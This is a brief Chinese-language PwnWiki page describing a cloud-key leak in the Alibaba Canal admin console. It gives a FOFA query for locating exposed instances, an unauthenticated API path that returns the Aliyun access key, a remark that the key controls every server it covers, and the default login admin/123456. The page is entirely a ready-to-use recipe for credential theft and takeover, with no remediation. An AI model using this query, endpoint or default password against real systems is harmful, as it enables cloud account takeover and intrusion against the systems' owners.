Alibaba Canal config 云密鑰信息洩露漏洞

From PwnWiki
Revision as of 17:01, 7 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="Canal Admin" </pre> ==Payload== <pre> /api/v1/canal/config/1/0 </pre> 其中洩露了 aliyun.access 密鑰,可以控制密鑰下的所有服務器...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

title="Canal Admin"

Payload

/api/v1/canal/config/1/0

其中洩露了 aliyun.access 密鑰,可以控制密鑰下的所有服務器


其中還含有默認口令 admin/123456